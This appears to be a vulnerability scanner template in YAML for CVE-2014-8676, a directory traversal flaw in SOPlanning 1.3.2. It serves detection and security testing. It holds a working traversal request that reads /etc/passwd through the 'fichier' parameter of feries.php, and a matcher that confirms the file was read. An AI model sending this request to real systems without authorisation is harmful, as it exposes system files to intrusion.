30 lines
900 B
YAML
30 lines
900 B
YAML
|
id: CVE-2014-8676
|
||
|
|
||
|
info:
|
||
|
name: Simple Online Planning Tool 1.3.2 - Directory Traversal
|
||
|
author: 0x_Akoko
|
||
|
severity: high
|
||
|
description: |
|
||
|
Directory traversal vulnerability in the file_get_contents function in SOPlanning 1.32 and earlier allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in a URL path parameter.
|
||
|
reference:
|
||
|
- https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-8676
|
||
|
classification:
|
||
|
cve-id: CVE-2014-8676
|
||
|
tags: cve,cve2014,soplanning,lfi
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:[x*]:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|